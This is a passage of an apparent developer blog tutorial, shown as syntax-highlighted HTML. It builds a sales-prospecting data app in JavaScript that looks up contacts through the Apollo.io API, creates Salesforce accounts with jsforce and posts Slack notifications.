            &lt;span class=&quot;token literal-property property&quot;&gt;jobTitle&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;people&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;title&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;photo&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;people&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;photo_url&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;email&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;people&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;email&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;company&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;organization&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token literal-property property&quot;&gt;website&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; contactResults&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;organization&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;website
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; icpInfo&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;findContactByRole&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;jobTitle&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; companyUrl&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; response&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; res &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; axios&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;post&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;https://api.apollo.io/v1/people/match&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;api_key&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;APOLLO_API_KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;q_organization_domains&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; companyUrl&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;person_titles&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;jobTitle&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token comment&quot;&gt;// headers belong in the axios config object, not the request body&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token literal-property property&quot;&gt;headers&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                    &lt;span class=&quot;token string-property property&quot;&gt;&quot;Content-Type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;application/json&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                    &lt;span class=&quot;token string-property property&quot;&gt;&quot;Cache-Control&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;no-cache&quot;&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        response &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; res&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; response&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Sending Leads to Salesforce&lt;/h3&gt;
&lt;p&gt;Now that we have all of our data, we can send it to Salesforce via their API. While we do have a &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-salesforce&quot;&gt;Salesforce connector available via Conduit&lt;/a&gt;, I wanted to showcase Turbine’s ability to leverage both the Meroxa platform and regular code for data movement. To send data into Salesforce, I will use the &lt;a href=&quot;https://jsforce.github.io/&quot;&gt;jsforce Node.js library&lt;/a&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; jsforce &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;jsforce&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;sendToSalesforce&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;companyInfo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; conn &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;jsforce&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Connection&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token literal-property property&quot;&gt;instanceUrl&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;SFDC_URL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token literal-property property&quot;&gt;accessToken&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;SFDC_ACCESS_TOKEN&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; conn&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;sobject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Account&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;create&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;Name&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; companyInfo&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;name &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// add whatever fields you want here&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;err&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ret&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;ret&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;success&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ret&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
                console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Created record id : &quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt; ret&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
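&lt;p&gt;As a side note, jsforce’s CRUD calls also return promises when no callback is passed, so the &lt;code class=&quot;language-text&quot;&gt;create&lt;/code&gt; call above could be written in the same async/await style as the rest of the app. A sketch, assuming the same &lt;code class=&quot;language-text&quot;&gt;conn&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;companyInfo&lt;/code&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;// Promise-based variant of the create call above (jsforce supports both styles)
const ret = await conn.sobject(&apos;Account&apos;).create({ Name: companyInfo.name });
if (!ret.success) {
    console.error(ret);
} else {
    console.log(&apos;Created record id : &apos; + ret.id);
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;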
&lt;h3&gt;Notifying the Sales Team in Slack&lt;/h3&gt;
&lt;p&gt;Once a new lead is in Salesforce, we want to notify the sales team in their Slack channel so they can begin outreach. You’ll need to get a token from the Slack settings; in this case, I’m using a &lt;a href=&quot;https://api.slack.com/authentication/token-types#bot&quot;&gt;bot user token&lt;/a&gt; so I can post as the Prospected app. If I wanted to format the message, I could include a blocks object.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;sendSlackNotification&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;companyInfo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; slackToken &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; process&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;SLACK_BOT_USER_TOKEN&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;catch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;err&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; url &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;https://slack.com/api/chat.postMessage&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; res &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; axios&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;post&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;url&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token literal-property property&quot;&gt;channel&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;#sales&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token literal-property property&quot;&gt;icon_emoji&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;:moneybag:&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token literal-property property&quot;&gt;username&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;Prospector&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token literal-property property&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;New Contact: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;companyInfo&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;name&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;
        	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;headers&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;authorization&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;Bearer &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;slackToken&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; 
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;Done&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; res&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
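&lt;p&gt;For example, the blocks object could look something like this — a sketch using a Slack Block Kit &lt;code class=&quot;language-text&quot;&gt;section&lt;/code&gt; block, where &lt;code class=&quot;language-text&quot;&gt;companyInfo&lt;/code&gt; carries the same fields as the &lt;code class=&quot;language-text&quot;&gt;icpInfo&lt;/code&gt; object built earlier and &lt;code class=&quot;language-text&quot;&gt;text&lt;/code&gt; is kept as the notification fallback:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;// Illustrative Block Kit payload; this object would replace the one
// passed to chat.postMessage above
const message = {
    channel: &apos;#sales&apos;,
    username: &apos;Prospector&apos;,
    text: `New Contact: ${companyInfo.name}`,
    blocks: [
        {
            type: &apos;section&apos;,
            text: {
                type: &apos;mrkdwn&apos;,
                text: `*New Contact:* ${companyInfo.name} (${companyInfo.jobTitle}) at ${companyInfo.company}`
            }
        }
    ]
};&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;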
&lt;h3&gt;Completing the Turbine Data App&lt;/h3&gt;
&lt;p&gt;Now that we have all the functions completed, the last step is to wire everything up and orchestrate the data. We also added a PostgreSQL resource, as seen below, so the data can power future analysis or a more full-featured dashboard.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// Import statements&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;// Main app code&lt;/span&gt;
exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token function&quot;&gt;digForGold&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;csvFiles&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		csvFiles&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;csvFile&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		fs&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;createReadStream&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;csvFile&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
			&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;pipe&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;csv&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;headers&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;skipLines&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
